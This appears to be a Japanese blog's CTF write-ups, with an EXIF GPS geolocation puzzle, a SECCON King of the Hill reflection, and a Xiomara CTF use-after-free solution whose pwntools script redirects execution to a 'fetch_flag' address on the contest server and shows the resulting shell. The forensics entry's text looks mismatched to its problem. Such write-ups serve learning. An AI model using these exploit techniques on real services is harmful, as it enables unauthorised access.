hiww_備忘録

Anime, CTF

DoubleS1405 CTF 2017 Writeup

DoubleS1405 CTF 2017にHarekazeとして参加しました。 チームの総得点は881点でした。

 [Misc 1]Mic Check

Problem

flag{W3lc0me_T0_DoubleS1405_CTF!}

FLAG: W3lc0me_T0_DoubleS1405_CTF!

[Misc 50] Instead of 5 billion won, I give you a cute handcuffs.

Problem 

In the fall of 2016, an e-mail arrived to detective Kim, who is tracking up economic fugitives who have shed large amounts of money from a large corporation.
I know the location of the perpetrator, but I can not tell you, and if you pay me 5 billion, I was attached with a photograph that would tell you the exact location.
The attached photo was taken nearest to his refuge.
Can Kim find out where the shooter escaped?
(The correct answer is the address in Korea. Example: 52-3, Yeonsan-dong, Yeonje-gu, Busan, Republic of Korea)

—- File Info —-

ctf% exiftool 1.JPG
ExifTool Version Number         : 10.40
File Name                       : 1.JPG
Directory                       : .
File Size                       : 5.1 MB
File Modification Date/Time     : 2017:03:25 12:50:02+09:00
File Access Date/Time           : 2017:03:25 12:51:43+09:00
File Inode Change Date/Time     : 2017:03:25 12:50:10+09:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
Exif Byte Order                 : Big-endian (Motorola, MM)
Make                            : Apple
Camera Model Name               : iPhone 6s
Orientation                     : Rotate 180
X Resolution                    : 72
Y Resolution                    : 72
Resolution Unit                 : inches
Software                        : 9.3.2
Modify Date                     : 2016:11:06 13:50:52
Y Cb Cr Positioning             : Centered
Exposure Time                   : 1/120
F Number                        : 2.2
Exposure Program                : Program AE
ISO                             : 40
Exif Version                    : 0221
Date/Time Original              : 2016:11:06 13:50:52
Create Date                     : 2016:11:06 13:50:52
Components Configuration        : Y, Cb, Cr, -
Shutter Speed Value             : 1/120
Aperture Value                  : 2.2
Brightness Value                : 5.751730959
Exposure Compensation           : 0
Metering Mode                   : Multi-segment
Flash                           : Off, Did not fire
Focal Length                    : 4.2 mm
Subject Area                    : 2015 1511 2217 1330
Run Time Flags                  : Valid
Run Time Value                  : 8415890928500
Run Time Epoch                  : 0
Run Time Scale                  : 1000000000
Acceleration Vector             : 0.9942806863 0.02069931851 -0.1201243357
Sub Sec Time Original           : 027
Sub Sec Time Digitized          : 027
Flashpix Version                : 0100
Color Space                     : sRGB
Exif Image Width                : 4032
Exif Image Height               : 3024
Sensing Method                  : One-chip color area
Scene Type                      : Directly photographed
Exposure Mode                   : Auto
White Balance                   : Auto
Focal Length In 35mm Format     : 29 mm
Scene Capture Type              : Standard
Lens Info                       : 4.15mm f/2.2
Lens Make                       : Apple
Lens Model                      : iPhone 6s back camera 4.15mm f/2.2
GPS Latitude Ref                : North
GPS Longitude Ref               : East
GPS Altitude Ref                : Above Sea Level
GPS Time Stamp                  : 04:50:51
GPS Speed Ref                   : km/h
GPS Speed                       : 0
GPS Img Direction Ref           : True North
GPS Img Direction               : 115.244898
GPS Dest Bearing Ref            : True North
GPS Dest Bearing                : 115.244898
GPS Date Stamp                  : 2016:11:06
GPS Horizontal Positioning Error: 10 m
Compression                     : JPEG (old-style)
Thumbnail Offset                : 2014
Thumbnail Length                : 14110
Image Width                     : 4032
Image Height                    : 3024
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Aperture                        : 2.2
GPS Altitude                    : 95.3 m Above Sea Level
GPS Date/Time                   : 2016:11:06 04:50:51Z
GPS Latitude                    : 37 deg 40' 11.91" N
GPS Longitude                   : 127 deg 0' 29.88" E
GPS Position                    : 37 deg 40' 11.91" N, 127 deg 0' 29.88" E
Image Size                      : 4032x3024
Megapixels                      : 12.2
Run Time Since Power Up         : 2:20:15
Scale Factor To 35 mm Equivalent: 7.0
Shutter Speed                   : 1/120
Create Date                     : 2016:11:06 13:50:52.027
Date/Time Original              : 2016:11:06 13:50:52.027
Thumbnail Image                 : (Binary data 14110 bytes, use -b option to extract)
Circle Of Confusion             : 0.004 mm
Field Of View                   : 63.7 deg
Focal Length                    : 4.2 mm (35 mm equivalent: 29.0 mm)
Hyperfocal Distance             : 1.82 m
Light Value                     : 10.5

Investigation

GPS Position: 37 deg 40' 11.91" N, 127 deg 0' 29.88" E
が残っていたのでGoogle Maps等に入れてみます。
競技中は
(The correct answer is the address in Korea.
Example: 대한민국 부산광역시 ~~구 ~~동 37-21)
だったので辛かった。

238-1 Ui-dong, Gangbuk-gu, Seoul, South Korea
대한민국 서울 강북구 우동 238-1
ここまでやったのですが、solvedしなかったので悩んでいたら
st98さんがハングルの地名の表記を直してくれて、solvedしてくれました.

FLAG: 대한민국 서울특별시 강북구 우이동 238-1  

www.geoimgr.com Google マップ

サイバーコロッセオxSECCON 2016 に参加した

2016.seccon.jp

チーム Harekaze として @jtwp470さん、 @megumishさん、@st98さんと私の4人で参加してきました。私自身、初めての King of the Hill でした。反省点としては競技中のメンバーの情報共有の方法を別に用意しておくべきだった点とDefenseポイントをもっと意識するべきだった点です。

下記に各チームが解いた問題一覧のスクショを発掘したので掲載しておきます。

f:id:hiww:20170427133348j:plain

 

 

内容

僕が唯一flagを提出したのはこの問題の1個目のフラグだけでした。
Firefoxでページをみていて、ボタンのdisabledを消すか1000位に調節すると丁度読める感じになりました。

巨大なpcapをUSBで渡されたのでWiresharkが落ちないようにゆっくりと読んでました。この問題は何もできませんでした。悔しいです。

解説の時にインターネットノイズの通信で実際に存在する攻撃手法らしく、それを問題にしたそうです。今回の場合はモールス信号になっていたみたいです。(エスパー力というか慣れが必要なのかな?)

感想

他の問題も取り組んだのですが、競技用ネットワークに繋いでいた為、チーム内での情報共有がうまくできてなかった。つらい。

でも、初めて King of the Hill 形式のCTF(オンサイト)にチームで参加して楽しむことができたので満足でした。

Xiomara CTF 2017 Write-up

Xiomara CTF 2017にHarekazeとして参加しました。 得点は1576点で15位/333でした。

 [Pwning 50] Use and Throw

Problem

I seem to have access to an old server. Can you get me something out of it?
I mean, I am not expecting much but something'd be really great. Anything goes. 
nc 139.59.61.220 12345
pwn50


ctf% nc 139.59.61.220 12345
[1] Register
[2] Report admin
[3] Save Data to server
[4] Delete user
[5] Exit
Enter your choice:3
Sending ur information to server ..

Investigation

ctf% file pwn50
pwn50: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), 
dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, 
BuildID[sha1]=e6a8871ec4d1215bf32e26a73b3fd7a6611a9710, not stripped 

ctf% checksec pwn50
[*] '/Users/CTF/2017/xiomaractf/pwn50'
Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

gdb-peda$ p/x &fetch_flag
$1 = 0x804868b

Exploit

ctf% python solve.py
[+] Opening connection to 139.59.61.220 on port 12345: Done
[*] Switching to interactive mode
Sending ur information to server ...
$ ls -ll    
total 88    
drwxr-xr-x   2 root root  4096 Feb 23 22:15 bin    
drwxr-xr-x   3 root root  4096 Feb 24 01:32 boot    
drwxr-xr-x  17 root root  3880 Feb 23 15:12 dev    
drwxr-xr-x 100 root root  4096 Feb 26 05:55 etc    
drwxr-xr-x  10 root root  4096 Feb 26 05:39 home    
lrwxrwxrwx   1 root root    32 Feb 24 01:32 initrd.img -> boot/initrd.img-4.4.0-64-generic    
lrwxrwxrwx   1 root root    32 Feb  4 17:24 initrd.img.old -> boot/initrd.img-4.4.0-62-generic    
drwxr-xr-x  22 root root  4096 Feb 24 17:26 lib    
drwxr-xr-x   2 root root  4096 Feb 24 18:34 lib32    
drwxr-xr-x   2 root root  4096 Feb  4 17:23 lib64    
drwxr-xr-x   2 root root  4096 Feb 24 18:34 libx32    
drwx------   2 root root 16384 Feb  4 17:33 lost+found    
drwxr-xr-x   2 root root  4096 Feb  4 17:22 media    
drwxr-xr-x   2 root root  4096 Feb  4 17:22 mnt    
drwxr-xr-x   2 root root  4096 Feb  4 17:22 opt    
dr-xr-xr-x 226 root root     0 Feb 23 15:12 proc    
drwx------   6 root root  4096 Feb 26 04:17 root    
drwxr-xr-x  26 root root  1100 Feb 26 05:56 run    
drwxr-xr-x   2 root root  4096 Feb  4 17:25 sbin    
drwxr-xr-x   2 root root  4096 Jan 14 15:06 snap    
drwxr-xr-x   3 root root  4096 Feb 23 15:37 srv    
dr-xr-xr-x  13 root root     0 Feb 25 10:36 sys    
drwx-wx-wt  17 root root  4096 Feb 26 06:47 tmp    
drwxr-xr-x  12 root root  4096 Feb 24 18:34 usr    
drwxr-xr-x  14 root root  4096 Feb 23 15:23 var    
lrwxrwxrwx   1 root root    29 Feb 24 01:32 vmlinuz -> boot/vmlinuz-4.4.0-64-generic    
lrwxrwxrwx   1 root root    29 Feb  4 17:24 vmlinuz.old -> boot/vmlinuz-4.4.0-62-generic    
$ cd home/pwn1
$ ls
flag.txt
pwn1
$ less flag.txt
xiomara{u$3_m3_n0t_wh3n_y0u_ar3_n0t_bu$y_buT_fr33}

FLAG: xiomara{u$3_m3_n0t_wh3n_y0u_ar3_n0t_bu$y_buT_fr33}

[Forensics & Network 100] (not) Guilty Boyfriend

Problem

My girlfriend is out of town and I found her memory card. Time to dig in, suckaaa. 
DD file

Do the Buffer Overflow. After that, get lulz_sec/flag.png LSB and show flag ex:)less flag.txt

(I am modifing experiment exploit code for public. Sorry to late.)

FLAG: xiomara{i_am_lord_of_hacker}

— Code —

from pwn import *
# s = process('./pwn50')
s = remote('139.59.61.220', 12345)

s.recvuntil('choice:')
s.sendline('1')
s.recvuntil('username:')
s.sendline('AAAA')
s.recvuntil('password:')
s.sendline('BBBB')

s.recvuntil('choice:')
s.sendline('4')

s.recvuntil('choice:')
s.sendline('2')
time.sleep(.5)
s.sendline(p32(0x804868b))

s.recvuntil('choice:')
s.sendline('3')

s.interactive()```